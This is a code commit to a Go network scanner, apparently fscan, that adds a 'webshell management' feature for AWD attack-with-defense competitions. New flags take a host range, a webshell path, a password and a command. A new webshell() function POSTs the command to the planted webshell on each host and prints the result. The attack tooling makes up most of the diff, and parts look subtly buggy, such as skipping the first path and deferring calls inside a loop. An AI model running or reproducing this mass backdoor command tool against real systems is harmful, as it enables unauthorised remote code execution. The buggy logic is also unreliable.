webshell管理

新增了awd环境下 常用的webshell连接功能

Author: LiDaoZang

Plugins/scanner.go

@@ -17,6 +17,21 @@ func Scan(info common.HostInfo) {
 		var wg = sync.WaitGroup{}
 		AddScan("1000003", info, ch, &wg) //webtitle
 	}
+
+	if common.WebShellPasswd != "" && common.WebShellPath!="" && common.WHost!=""{
+		common.WHosts, _ =common.ParseIP(common.WHost, common.HostFile, common.NoHosts)
+		for _,host:=range common.WHosts{
+			common.WebShellPaths = append(common.WebShellPaths, "http://"+host+common.WebShellPath)
+		}
+		paths := common.WebShellPaths[1:]
+		paths=reverse(paths)
+		for _,path:=range paths{
+			defer webshell(path,common.Wcommand,common.WebShellPasswd)
+			_ = recover()
+
+		}
+	}
+
 	fmt.Println("start infoscan")
 	Hosts, err := common.ParseIP(info.Host, common.HostFile, common.NoHosts)
 	if err != nil {
@@ -133,3 +148,16 @@ func IsContain(items []string, item string) bool {
 	}
 	return false
 }
+
+// 数组倒序
+func reverse(arr []string)(arrs []string) {
+	length := len(arr)
+	var temp string
+	for i := 0; i < length/2; i++ {
+		temp = (arr)[i]
+		(arr)[i] = (arr)[length-1-i]
+		(arr)[length-1-i] = temp
+	}
+	return arr
+}
+

Plugins/webshell.go

@@ -0,0 +1,46 @@
+package Plugins
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"strings"
+	"time"
+)
+
+func webshell(path string,Wcommand string,passwd string)  {
+	data :=passwd+"="+Wcommand
+	reader :=strings.NewReader(string(data))
+	request,err := http.NewRequest("POST",path,reader)
+	defer request.Body.Close()
+	if err!=nil{
+		fmt.Println(err.Error())
+		return
+	}
+	request.Header.Set("Content-Type","application/x-www-form-urlencoded")
+	client :=http.Client{
+		Transport: &http.Transport{
+			Dial: func(netw, addr string) (net.Conn, error) {
+				c, err := net.DialTimeout(netw, addr, time.Second*3) //设置建立连接超时
+				if err != nil {
+					return nil, err
+				}
+				c.SetDeadline(time.Now().Add(5 * time.Second)) //设置发送接收数据超时
+				return c, nil
+			},
+		},
+	}
+	resp,err := client.Do(request)
+	if err!=nil {
+		//fmt.Println(err.Error())
+		fmt.Println(path+" 连接异常")
+		return
+	}
+
+	respBytes, _ := ioutil.ReadAll(resp.Body)
+	fmt.Println(string(respBytes))
+
+	return
+
+}

common/Parse.go

@@ -126,7 +126,7 @@ func Readfile(filename string) ([]string, error) {
 }
 
 func ParseInput(Info *HostInfo) {
-	if Info.Host == "" && HostFile == "" && URL == "" && UrlFile == "" && SearchPoc ==""{
+	if Info.Host == "" && HostFile == "" && URL == "" && UrlFile == "" && SearchPoc =="" && WHost==""{
 		fmt.Println("Host is none")
 		flag.Usage()
 		os.Exit(0)
@@ -179,6 +179,9 @@ func ParseInput(Info *HostInfo) {
 }
 
 func ParseScantype(Info *HostInfo) {
+	if WHost !=""{
+		return
+	}
 	_, ok := PORTList[Scantype]
 	if !ok {
 		showmode()
@@ -242,5 +245,8 @@ func showmode() {
 	for name := range PORTList {
 		fmt.Println("   [" + name + "]")
 	}
-	os.Exit(0)
+	if WHost=="" {
+		os.Exit(0)
+
+	}
 }

common/config.go

@@ -97,6 +97,13 @@ var (
 	Socks5Proxy   string
 	Hash          string
 	HostPort      []string
+	WHost		  string
+	WHosts		  []string
+	WebShellPath  string
+	WebShellPasswd	string
+	WebShellPaths	[]string
+	Wcommand		string
+
 )
 
 var (

common/flag.go

@@ -79,6 +79,10 @@ func Flag(Info *HostInfo) {
 	flag.IntVar(&PocNum, "num", 20, "poc rate")
 	flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
 	flag.StringVar(&SearchPoc, "SearchPoc", "", "Input PocKey Select Poc")
+	flag.StringVar(&WHost,"WHost","","WebShell Host")
+	flag.StringVar(&WebShellPath,"WebShellPath","","WebShellPath,as: /1.php")
+	flag.StringVar(&WebShellPasswd,"WebShellPasswd","","WebShellPasswd,as: 123456")
+	flag.StringVar(&Wcommand,"Wcommand","","webshell order")
 
 	flag.Parse()
 }